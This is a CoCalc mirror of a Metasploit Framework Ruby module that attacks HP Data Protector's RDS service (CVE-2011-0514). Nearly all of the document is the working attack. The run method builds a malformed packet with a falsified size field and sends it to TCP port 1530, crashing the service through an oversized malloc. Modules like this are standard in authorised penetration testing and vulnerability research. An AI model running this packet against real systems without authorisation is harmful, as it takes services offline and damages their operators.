Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/hp/data_protector_rds.rb
19715 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::Tcp

8
  include Msf::Auxiliary::Dos

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'HP Data Protector Manager RDS DOS',

15
        'Description' => %q{

16
          This module causes a remote DOS on HP Data Protector's RDS service.  By sending

17
          a malformed packet to port 1530, _rm32.dll causes RDS to crash due to an enormous

18
          size for malloc().

19
        },

20
        'Author' => [

21
          'Roi Mallo <rmallof[at]gmail.com>', # initial discovery, poc

22
          'sinn3r', # msf

23
        ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          [ 'CVE', '2011-0514' ],

27
          [ 'OSVDB', '70617' ],

28
          [ 'EDB', '15940' ],

29
        ],

30
        'DisclosureDate' => '2011-01-08',

31
        'Notes' => {

32
          'Stability' => [CRASH_SERVICE_DOWN],

33
          'SideEffects' => [],

34
          'Reliability' => []

35
        }

36
      )

37
    )

38


39
    register_options([

40
      Opt::RPORT(1530),

41
    ])

42
  end

43


44
  def run

45
    buf = "\x23\x8c\x29\xb6" # Header

46
    buf << "\x64\x00\x00\x00" # Packet size

47
    buf << "\x41" * 4 # Data

48


49
    connect

50
    print_status('Sending malformed packet...')

51
    sock.put(buf)

52
    disconnect

53
  end

54
end

55


56